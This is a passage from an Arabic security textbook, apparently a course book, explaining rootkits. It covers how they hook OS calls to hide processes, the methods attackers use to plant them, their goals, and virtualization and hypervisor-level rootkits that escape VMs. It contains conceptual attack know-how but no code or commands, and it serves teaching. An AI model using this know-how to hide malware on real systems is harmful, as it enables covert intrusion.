طﻠب إﻟﻰ ﻣﺳﺗوﯾﺎت أدﻧﻰ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻹﻛﻣﺎل اﻟﻣﮭﻣﺔ .أذﻛر أن ﺑﻌض Rootkitsﯾﻌﯾش ﻓﻲ ﻋﻣﻖ ﻧظﺎم اﻟﺗﺷﻐﯾل .ﯾﻣﻛن أن ﺗﻌﻣل أﯾﺿﺎ "
" hookingأو اﻋﺗراض ھذه اﻟﻧداءات اﻟﻣﺧﺗﻠﻔﺔ ﺑﯾن اﻟﺑرﻧﺎﻣﺞ وﻧظﺎم اﻟﺗﺷﻐﯾل.
ﻣن ﺧﻼل اﺻطﯾﺎد اﻟطﻠب ﻣن ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت ،ﻓﺎن Rootkitsﻗﺎدر ﻋﻠﻰ ﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺔ اﻟطﺑﯾﻌﯾﺔ .اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ :اﻓﺗرض
أﻧك ﺗرﯾد أن ﺗرى ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز .ﻹﻧﺟﺎز ھذا ،ﻓﺈن ﻣﻌظم اﻟﻣﺳﺗﺧدﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗرﻛﯾﺑﺔ اﻟﻣﻔﺎﺗﯾﺢ "
.“ Ctrl + Alt + Delوھذا ﺳوف ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﺑدء ﻓﻲ إدارة اﻟﻣﮭﺎم وﻋرض اﻟﻌﻣﻠﯾﺎت واﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل .ﻣﻌظم اﻟﻧﺎس ﺗﻘوم
ﺑﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻣن دون اﻟﺗﻔﻛﯾر ﻓﯾﮫ .ﺣﯾث ﯾﻘوم ﺑﺎﻟﻧظر ﻓﻲ ﻗﺎﺋﻣﺔ ﻋرض اﻟﻌﻣﻠﯾﺔ ﺛم اﻟﻣﺿﻲ ﻗدﻣﺎ.
ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،اﻟﺑرﻧﺎﻣﺞ ھو إﺟراء ﻣﻛﺎﻟﻣﺔ إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﺳﺄل ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت أو اﻟﺧدﻣﺎت ﻗﯾد اﻟﺗﺷﻐﯾل .ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﺳﺗﻌﻠم ﻋن ﺟﻣﯾﻊ
اﻟﺑراﻣﺞ ﻗﯾد اﻟﺗﺷﻐﯾل ﺛم إرﺟﺎع اﻟﻘﺎﺋﻣﺔ .وﻣﻊ ذﻟك ،إذا أﺿﻔﻧﺎ Rootkitsﻟﮭذا اﻟﻣزﯾﺞ ،ﻓﺳوف ﺗﺻﺑﺢ اﻷﻣور أﻛﺛر ﺗﻌﻘﯾدا .وذﻟك ﻷن
Rootkitsﻟدﯾﮭﺎ اﻟﻘدرة ﻋﻠﻰ اﻋﺗراض وﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺎت ﻋﺎد ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل ،ﻋﻧدﻣﺎ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻋرض ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺔ ،ﯾﻣﻛن ﻟل
Rootkitsﺑﺑﺳﺎطﺔ إزاﻟﺔ ﺑراﻣﺞ ﻣﺧﺗﺎرة ،واﻟﺧدﻣﺎت ،واﻟﻌﻣﻠﯾﺎت ﻣن اﻟﻘﺎﺋﻣﺔ .ھذا ﯾﺣدث ﻋﻠﻰ اﻟﻔور واﻟﻣﺳﺗﺧدم ﻟﯾس ﻋﻠﻰ ﻋﻠم ﺑﺄي اﺧﺗﻼﻓﺎت.
اﻟﺑرﻧﺎﻣﺞ ﻧﻔﺳﮫ ھو ﻓﻲ اﻟواﻗﻊ ﯾﻌﻣل ﻋﻠﻰ ﻧﺣو ﻣﺛﺎﻟﻲ .ﺣﯾث ﯾﻘدم ﺗﻘﺎرﯾر ﺑﺎﻟﺿﺑط ﻣﺎ ﻗﯾل ﻟﮫ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل .ﻓﻲ ﻛﺛﯾر ﻣن اﻟﻣﻌﺎﻧﻲ ،ﻓﺎن
Rootkitsھو اﻟذي ﯾﺟﻌل ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﻛذب.
ﻣن اﻟﻣﮭم أن ﻧﺷﯾر إﻟﻰ أن Rootkitsﻟﯾﺳت Rootkits .exploitھو اﻟﺷﻲء اﻟذى ﯾﺗم ﺗﺣﻣﯾﻠﮫ ﻋﻠﻰ اﻟﻧظﺎم ﺑﻌد أن ﯾﺗم exploitاﻟﻧظﺎم.
وﻋﺎدة ﻣﺎ ﺗﺳﺗﺧدم Rootkitsﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت أو اﻟﺑراﻣﺞ واﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﻣﺳﺗﺗر اﻟﺧﻔﻲ.
Rootkitsھﻲ ﺑراﻣﺞ ﺗﮭدف إﻟﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ .ھذه ھﻲ اﻟﺑراﻣﺞ اﻟﺿﺎرة اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول
ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻷﻧﺷطﺔ اﻟﺧﺑﯾﺛﺔ .أﯾﺿﺎ ﻣن أھداف Rootkitsھو اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات اﻟﻣﺳﺗﺧدم
اﻟﺟذري/اﻹداري ) (root/adminإﻟﻰ اﻟﻧظﺎم .ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم اﻟﺟذري اﻟﻰ ھذا اﻟﻧظﺎم ،ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﻧﻔﯾذ أي
ﻣﮭﻣﺔ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو ﺣذف اﻟﻣﻠﻔﺎت ،اﻟﺦ .ﯾﻌﻣل ﻋن طرﯾﻖ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت .ﺗﺗﺄﻟف Rootkits
اﻟﻧﻣوذﺟﯾﺔ ﻣن ﺑراﻣﺞ ،backdoorوﺑراﻣﺞ ،DDOSﺣزم ﺗﺟﺳس ) ،(Sniffing Packetوأدوات ،IRC bots ،log-wipingاﻟﺦ.
ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت ﺗﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن .attributesھﻧﺎك ﺣﻘول ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﺳﻣﺎت اﻟﻣﻠف) . (file attributesﯾﺳﺗﺧدم اﻟﺣﻘل اﻷول
ﻟﺗﺣدﯾد ﺗﻧﺳﯾﻖ اﻟﻣﻠف) ، (format of the fileواﻟﺗﻲ ﻗد ﺗﻛون إﻣﺎ ،archive ،hidden ،أو .read-onlyﯾﺻف ﺣﻘل آﺧر اﻟﻣرة اﻟﺗﻲ ﺗم
إﻧﺷﺎء اﻟﻣﻠف ﻓﯾﮭﺎ ،اﻟوﻗت اﻟذي ﺗم اﻟوﺻول اﻟﯾﮫ ،طول اﻟﻣﻠف .اﻟوظﯾﻔﺔ )( GetFileAttributesExو
)( GetFilelnformationByHandleﺗﺳﻣﺢ ﺑﮭذا.
ﯾﺳﺗﺧدم ATTRIB.exeﻟﻌرض أو ﺗﻐﯾﯾر ﺳﻣﺎت اﻟﻣﻠف) . (file attributesﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﺧﻔﺎء ،أو ﺣﺗﻰ ﺗﻐﯾﯾر ﺳﻣﺎت ﻣﻠﻔﺎت اﻟﺿﺣﯾﺔ،
ﻟذﻟك ﯾﻣﻛن اﻟﻣﮭﺎﺟم اﻟوﺻول إﻟﯾﮭﺎ.
ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑوﺿﻊ Rootkitsﺑﺎﺳﺗﺧدام اﻟطرق اﻷﺗﯾﺔ:
-ﻓﺣص أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺿﻌﯾﻔﺔ واﻟﺧوادم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت.
-ﺗﻐﻠﯾف Rootkitsﻓﻲ ﻣﺟﻣوﻋﺔ ﺧﺎﺻﺔ ﻣن اﻟﺣزم ﻣﺛل اﻷﻟﻌﺎب.
-ﺗﺛﺑﯾت Rootkitsﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻌﺎﻣﺔ أو أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻟﻠﺷرﻛﺎت ﻣن ﺧﻼل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ.
-إطﻼق ھﺟوم ) zero-dayﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ،ﺗﺟﺎوز ﺳﻌﺔ اﻟﻣﺧزن اﻟﻣؤﻗت واﺳﺗﻐﻼل ﻧواة وﯾﻧدوز ،اﻟﺦ(.
-طرق اﻟراﺑط واﻟﺑوت ﻣن ،ICQ ،IRCاﻟﺦ(Means of a link and a bot from IRC, ICQ, etc) .
اﻟﻐرض اﻷﺳﺎﺳﻲ ﻣن Rootkitsھو اﻟﺳﻣﺎح ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﻟوﺻول اﻟﻣﺗﻌدد اﻟﻐﯾر ﻣﻧظم واﻟﻐﯾر ﻣﻛﺗﺷف إﻟﻰ اﻟﻧظﺎم .ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺛﺑﯾت ﻋﻣﻠﯾﺔ
ﻣﺳﺗﺗرة أو اﺳﺗﺑدال واﺣد أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻓﻲ ﻋﻣﻠﯾﺎت اﻻﺗﺻﺎل اﻟﻌﺎدي.
اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا Rootkitsﻟﻸھداف اﻟﺗﺎﻟﯾﺔ:
-اﻟوﺻول اﻟﻰ اﻟﻧظﺎم اﻟﻣﺿﯾف ﻛﻣﺳﺗﺧدم ﺟذري واﻟوﺻول اﻟﻣﺳﺗﺗر ﻋن ﺑﻌد.
-ﻟﺻﻧﻊ ﻗﻧﺎع ﻟﻣﺳﺎرات اﻟﻣﮭﺎﺟم واﻟﺗطﺑﯾﻘﺎت أو اﻟﻌﻣﻠﯾﺎت اﻟﺧﺑﯾﺛﺔ.
-ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ ،وﺣرﻛﺔ ﻣرور اﻟﺑﯾﺎﻧﺎت ،وﻣﺎ إﻟﻰ ذﻟك ﻣن اﻟﻧظﺎم اﻟذي ﻗد ﯾﻛون ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣﻘﯾدة أو ﻻ ﯾﻣﻠﻛوا
اﻟوﺻول اﻟﯾﮭﺎ.
-ﺗﺧزﯾن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى ،وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ﯾﺣﺗوي ﻋﻠﻰ ﻣوارد ﺗﺳﺗﺧدم ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺗﺣدﯾﺛﺎت ﺑوت وھﻠم ﺟرا.
Types of Rootkits
Rootkitsھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺧﻔﻲ ﻧﻔﺳﮭﺎ ﻋن ﺗطﺑﯾﻘﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻓﻲ اﻟﻛﻣﺑﯾوﺗر .ﯾوﻓر
ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟوﺻول ﻟﻠﻣﺳﺗوى اﻟﺟذري إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺧﻼل .backdoorھذه Rootkitsﺗوظف ﻣﺟﻣوﻋﺔ ﻣن اﻟﺗﻘﻧﯾﺎت
ﻟﻠﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم .ﻧوع Rootkitsﯾؤﺛر ﻋﻠﻰ اﺧﺗﯾﺎر ﻣوﺟﮫ اﻟﮭﺟوم .أﺳﺎﺳﺎ ھﻧﺎك ﺳﺗﺔ أﻧواع ﻣن Rootkitsاﻟﻣﺗﺎﺣﺔ .وھم:
Hypervisor-level Rootkit
ﻣن اﻟﻣﻌروف ﻟﻠﺟﻣﯾﻊ اﻧﺗﺷﺎر ﺗﻛﻧوﻟوﺟﯾﺎ ال Virtualizationﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة ﻓﻲ ﺻورة ﺑراﻣﺞ ال Virtual Machineاﻟﻣﻧﺗﺷرة واﻟﺗﻲ
ﺗﻣﻛﻧﺎ ﻣن ﻋﻣل ﺟﮭﺎز وھﻣﻲ ﺑﻧظﺎم ﺗﺷﻐﯾل ﻣﻧﻔﺻل ﻋن اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ .وﻣن أﺷﮭر ھذه اﻟﺑراﻣﺞ ھو ﺑرﻧﺎﻣﺞ ال VMWareوﻏﯾرھﺎ
وﺗﺳﺗﺧدم طﺑﻌﺎ اﻷﻧظﻣﺔ اﻟوھﻣﯾﺔ ﻓﻲ ﺗﺣﻠﯾل اﻟﻔﯾروﺳﺎت واﻟروت ﻛﯾت وﻓﻲ اﺧﺗﺑﺎر اي ﺷﻲء ﺗرﯾد اﺧﺗﺑﺎره ﺑﻣﻌزل ﻋن ﺟﮭﺎزك وﺗﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ
ﺑﻧﺎء ﺧوادم ﻣﺗﻌددة اﻷﻧظﻣﺔ Hypervisor-level rootkits .ﻋﺎدة ﻣﺎ ﯾﺗم إﻧﺷﺎؤھﺎ ﻣن ﺧﻼل اﺳﺗﻐﻼل ﻣﯾزة اﻷﺟﮭزة
) (Exploiting hardware featureﻣﺛل Intel VTو Rootkits . AMD-Vھذه ﺗﺗﻌﺎﻣل ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﻠﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻋﻠﻰ أﻧﮫ
آﻟﺔ اﻓﺗراﺿﯾﺔ ) (virtual machineواﻟﺗﻲ ﺗﻣﻛﻧﮫ ﻣن اﻋﺗرض ﺟﻣﯾﻊ اﺳﺗدﻋﺎءات اﻷﺟﮭزة اﻟﺗﻲ أدﻟﻰ ﺑﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﮭدف .ھذا اﻟﻧوع ﻣن
Rootkitsﯾﻌﻣل ﻋن طرﯾﻖ ﺗﻌدﯾل ﺗﺳﻠﺳل ﺗﻣﮭﯾد/ﺗﺷﻐﯾل اﻟﻧظﺎم ) (The system's boot sequenceﺛم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل ﺑدﻻ ﻣن ﺷﺎﺷﺔ
اﻟﺟﮭﺎز اﻟوھﻣﻲ اﻷﺻﻠﻲ ).(original virtual machine
وﻟﻠﺗﻌرف أﻛﺛر ﻋﻠﻰ ال Virtual Rootkitsاو Hypervisor-level rootkitsﯾﺟب ان ﻧﺗﻌرف ﻗﻠﯾﻼ ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ ال Virtualization
واﻟﺗﻲ ﺗﻧﻘﺳم اﻟﻲ ﺛﻼث ﻋﻧﺎﺻر رﺋﯾﺳﯾﺔ وھﻲ:
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
437
Hypervisor -
Virtualization strategies -
Virtual memory management -
ﺑﻌد ذﻟك ﺳﻧﺗﻌرف ﻋﻠﻰ اﺳﺎﻟﯾب ال Virtual Rootkitﻣﺛل:
- Escaping from a virtual environment
- Hijacking the hypervisor
Virtualization
ﻋﻣﻠﯾﺔ اﻟــ Virtualizationﺑﺎﺧﺗﺻﺎر ھﻲ ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم ﻣوارد Resourcesاﻟﺟﮭﺎز اﻟواﺣد ﻋﻠﻰ أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل OSﺗﻌﻣل ﺳوﯾﺎ ﻓﻲ
ﻧﻔس اﻟوﻗت .وﻗﺑل ﺗﻛﻧوﻟوﺟﯾﺎ ال Virtualizationﻛﺎن ﯾﻌﻣل اﻟﺟﮭﺎز ﺑﻛل ﻣوارده ﻟﺗﺷﻐﯾل ﻧظﺎم ﺗﺷﻐﯾل واﺣد ﻓﻘط ﻣﻣﺎ ﯾﻌﻧﻲ ﺿﯾﺎع ﻣوارد
ﻛﺛﯾره ﻟﻠﺟﮭﺎز ﺧﺎﺻﺔ ﺑﻌد اﻟطﻔرة اﻟﻛﺑﯾرة اﻟﺗﻲ ﺣدﺛت ﻓﻲ ﻗدرات اﻷﺟﮭزة وﻓﻲ ﺻﻧﺎﻋﺔ اﻟﻣﻌﺎﻟﺟﺎت واﯾﺿﺎ زﯾﺎدة ﺳﻌﺔ اﻟﺗﺧزﯾنMemory
وﺗﺳﺗﺧدم ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻷن ﻓﻲ اﻟﺳﯾرﻓرات ﺣﯾث ﯾﺳﺗطﯾﻊ ﻣدﯾر اﻟﺳﯾرﻓر ﺗﺷﻐﯾل أﻛﺛر ﻣن Web Serverﻋﻠﻰ ﺟﮭﺎز اﻟواﺣد .اﯾﺿﺎ اﻧﺗﻘﻠت
ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻲ اﻷﺟﮭزة اﻟﻌﺎدﯾﺔ PCﺣﯾث ﯾﺳﺗطﯾﻊ اﻟﻣﺳﺗﺧدم ﺗﺷﻐﯾل أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ ﻣﺛل ﺗﺷﻐﯾل اﻟوﯾﻧدوز ﻣﻊ ال. Linux
Virtualization of system resources
أﻧواع ال Virtual Machines
-1اﻟﻧوع اﻷول Process Virtual Machineاﯾﺿﺎ ﯾﻌرف ﺑــ Application Virtual Machineوھو ﺑﺎﺧﺗﺻﺎر ﻟﺗﺷﻐﯾل
Processﻣﻌﯾﻧﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺛل ال Java Virtual Machineوال Dot NET Frameworkﻓﮭذه اﻷﺷﯾﺎء اﯾﺿﺎ
ﺗﻧدرج ﺗﺣت ﻣﺳﻣﻲ اﻷﺟﮭزة اﻟوھﻣﯾﺔ. Virtual Machines
-2اﻟﻧوع اﻟﺛﺎﻧﻲ System Virtual Machinesاﯾﺿﺎ ﯾﻌرف ﺑــ Hardware virtual machineوھذا ﻣﺧﺻص ﻟﻛﻲ ﯾﻌﻣل
أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ.
Hypervisor
ھو أﺣد اھم ﻋﻧﺎﺻر ال Hardware VMطﺑﻌﺎ VMاﺧﺗﺻﺎر ﻟــ Virtual Machineوھو اﻟﻣﺳؤول ﻋن Handles System
level virtualizationﻟﻛل ال VMsاﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ Host Systemوھو اﯾﺿﺎ ﯾدﯾر ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم اﻟﻣوارد واﻟﺗﺷﻐﯾل
ﺑﯾن ال Physicalوال Virtual Hardwareاﯾﺿﺎ ھو اﻟﻣﺳؤول ﻋن ﻋﻣﻠﯾﺔ ﻋزل ال VMsﻋن ﺑﻌﺿﮭﺎ وﺗﻘﺳﯾم اﻟﻣوارد ﺑﯾﻧﮭﺎ .ﻓﮭو اﻟﻌﻘل
اﻟﻣﺗﺣﻛم ﻓﻲ ﻋﻣﻠﯾﺔ الvirtualization
ﯾوﺟد ﻧوﻋﯾن ﻣن ال: Hypervisor
-اﻟﻧوع اﻷول Nativeوھو ﯾﺗم وﺿﻌﺔ ﻓﻲ اﻟﻠوﺣﺔ اﻷم ﻧﻔﺳﮭﺎ Motherboardاي ان ﺗﻛﻧوﻟوﺟﯾﺎ ال VMﻓﻲ ھذا اﻟﻧوع ﻟﯾﺳت
ﻣﺟرد ﺑرﻧﺎﻣﺞ ﺑل ھﻲ ﺗدﺧل ﻓﻲ ﺗرﻛﯾب ال Hardwareاﯾﺿﺎ .وﻣن اﻣﺛﻠﺔ اﻟﻣﻌﺎﻟﺟﺎت اﻟﺗﻲ ﺗدﻋم ﺧﺎﺻﯾﺔ ال Native Hypervisor
ﻣﻌﺎﻟﺟﺎت AMD-V/Pacificaو Intel VTو.UltraSPARC T1
-اﻟﻧوع اﻟﺛﺎﻧﻲ Hostedوھو اﻟﻧوع اﻟﺑرﻣﺟﻲ اﻟذي ﯾﺗم وﺿﻌﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ Host OSﻣﺛل ﺑراﻣﺞ ال VMWare
وال .Oracle Virtual Box
Virtualization strategies
ﯾوﺟد ﺛﻼث اﻧواع ﻣن طرق ال Virtualizationاﻟﻣﺳﺗﺧدﻣﺔ ﺣﺎﻟﯾﺎ واﻟﺗﻲ ﺗﺧﺗﻠف ﻣن ﻧظﺎم ﺗﺷﻐﯾل اﻟﻲ أﺧر وﻣن ﻋﻧﺎﺻر ال Hardware
اﻟﻣﺳﺗﺧدﻣﺔ.
اﻟطرﯾﻘﺔ اﻷوﻟﻲ ھﻲ virtual machine emulationوھو ﯾﺣﺗﺎج اﻟﻲ hypervisorﯾﻘوم ﺑﻣﺣﺎﻛﺎة اﻷﺟﮭزة Hardwareاﻟﺣﻘﯾﻘﯾﺔ
ﺑﺄﺧرى ﺗﺧﯾﻠﯾﺔ ﯾﺳﺗﺧدﻣﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال VMواﻟذي ﯾﺳﻣﻲ guest OSﻓﮭو ﯾوھم ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺗﺧﯾﻠﻲ ﺑﺎﻧﺔ ﯾﺗﻌﺎﻣل ﻣﻊ
Hardwareﺣﻘﯾﻘﯾﺔ .واھم ﺷﻲء ﻓﻲ ھذه اﻟطرﯾﻘﺔ ھو ﺗوﻓﯾر ﻛل اﻟﺻﻼﺣﯾﺎت ﻟﻠﻧظﺎم اﻟوھﻣﻲ Privilege Levelﻣﺛل ﺻﻼﺣﯾﺎت اﺳﺗدﻋﺎء
Privileged CPU instructionsوھذا ﯾوﻓره ال hypervisorﻧﻔﺳﮫ.
اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ ھﻲ paravirtualizationوھﻲ ﻋﻛس اﻟطرﯾﻘﺔ اﻷوﻟﻲ ﺣﯾث ﻻ ﯾﻘوم ال hypervisorﺑﺗوﻓﯾر ال Privileged CPU
instructionsوﻻ ﯾﻘوم ﺑﻣﺣﺎﻛﺎة ﻟل Hardwareﻓﮭذه اﻟطرﯾﻘﺔ ﯾدرك ﻓﯾﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوھﻣﻲ اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ ﺟﮭﺎز وھﻣﻲVM
اﻟطرﯾﻘﺔ اﻟﺛﺎﻟﺛﺔ ھﻲ OS-level virtualizationوﻣن اﻻﺳم ﯾﺗﺿﺢ ان ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ ھو ﻣن ﯾﻘوم ﺑﻌﻣﻠﯾﺔ اﻟﻌزل.
Virtual memory management
ﻣن اھم وظﺎﺋف ال hypervisorھو ﺗﺣوﯾل ال physical Hardware MemoryاﻟﻲVirtual Hardware Memory
وﻛﻣﺎ ﻧﻌﻠم ﻓﺎن ﻣﺻطﻠﺢ ال Virtual Memoryﻟﯾس ﺧﺎص ﺑﻌﻣﻠﯾﺔ ال virtualizationﻓﻘط ﺑل ان ﻛل اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ ﺗﻘوم
ﺑﺎﺳﺗﺧدام ال Virtual memoryوذﻟك ﻟﻛﻲ ﺗدﻋم ﻋﻣﻠﯾﺔ الmultiprocessing
اﯾﺿﺎ ﻣن اھم وظﺎﺋف ال hypervisorﻋﻣﻠﯾﺔ ﻋزل ﻛل Virtual Memoryﯾﺳﺗﺧدﻣﮭﺎ VMﻋن اﻷﺧرى .ﻓﻛل VMﯾﻛون ﻟﮫ ال
memory spaceاﻟﺧﺎص ﺑﮫ واﻟﺗﻲ ﻻ ﯾﺳﺗطﯾﻊ اي VMاﺧر اﻟوﺻول اﻟﯾﮭﺎ .وھذه اﻟﻌﻣﻠﯾﺔ ﺗﻌرف ﺑــvirtual machine isolation
اﺳﺎﻟﯾب الVirtual Rootkit
ﻛﻣﺎ ﻗﻠﻧﺎ ﻓﺎن ال Virtual Rootkitsھﻲ روت ﻛﯾت ﺑرﻣﺟت ﺧﺻﯾﺻﺎ ﻟﻛﻲ ﺗﻌﻣل ﻋﻠﻰ ال VMوﺗﻧﺗﻘل ﻣﻧﺔ اﻟﻲ ال Host Machineﻟذﻟك
ﻓﺎن اول ﻣﮭﻣﺔ ﺗﻘوم ﺑﮭﺎ ھذه اﻟروت ﻛﯾت ھﻲ ﻋﻣﻠﯾﺔ اﻟــ Escaping from a virtual environmentواول ﺧطوة ﻓﻲ ھذه اﻟﻌﻣﻠﯾﺔ ھﻲ
ان ﯾﻛﺗﺷف اﻟروت ﻛﯾت اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ VMوﻟﯾس ﻋﻠﻰ ﺟﮭﺎز ﺣﻘﯾﻘﻲ.
ﯾوﺟد 3اﻧواع رﺋﯾﺳﯾﺔ ﻣن ال: Virtual Rootkits
اﻟﻧوع اﻷول ھو ) Virtualization-aware malware (VAMوھو ﻣﺧﺻص ﻟﻠﻔﯾروﺳﺎت واﻟﺑرﻣﺟﯾﺎت اﻟﺿﺎرة ﻓوظﯾﻔﺗﮫ اﻧﮫ ﯾﻘوم ﺑﺎﻛﺗﺷﺎف
ال VMﺛم ﯾﻌدل ﻣن ﺧﺻﺎﺋﺻﮫ ﻓﯾﻣﺎ ﯾﻌرف ﺑﻌﻣﻠﯾﺔ ال polymorphicﺣﺗﻰ ﻻ ﯾﺳﺗطﯾﻊ ﻣﺣﻠل اﻟﻔﯾروﺳﺎت اﻟﺗﻌرف ﻋﻠﯾﺔ .اﯾﺿﺎ ﻟدﯾﺔ وظﯾﻔﺔ
اﺧري وھو ﻣﮭﺎﺟﻣﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟذي ﯾﻌﻣل ﻋﻠﻰ ال. VM
اﻟﻧوع اﻟﺛﺎﻧﻲ ھو ) Virtual machine-based rootkits (VMBRوھو اﻟﻧوع اﻟﺗﻘﻠﯾدي وھو اﻟذي ﯾﺳﺗطﯾﻊ اﻻﻧﺗﻘﺎل ﻣن ال VMاﻟﻲ
اﻟﺟﮭﺎز اﻷﺻﻠﻲ ﻋن طرﯾﻖ ﺑرﻧﺎﻣﺞ ال VMﻧﻔﺳﮫvirtualization software
اﻟﻧوع اﻟﺛﺎﻟث ھو Hypervisor virtual machine (HVM) rootkitsوھو أﺧطر ﻧوع ﻷﻧﮫ ﯾﻘوم ﺑﻣﮭﺎﺟﻣﺔ ال hypervisorﻧﻔﺳﮫ
واﺳﺗﺑداﻟﮫ ﺑﺄﺧر ﻣﻌدل وﺑﺎﻟﺗﺎﻟﻲ اﺻﺎﺑﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال VMوﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ. host
ﺑﻌد اﻛﺗﺷﺎف اﻟروت ﻛﯾت ﻟل VMﺗﺄﺗﻲ اﻟﻣﮭﻣﺔ اﻷھم وھﻲ اﻟوﺻول اﻟﻲ ال host machineوﺗﺗم ﻋﻣﻠﯾﺔ اﻟوﺻول ﻟل hostﻋن طرﯾﻖ
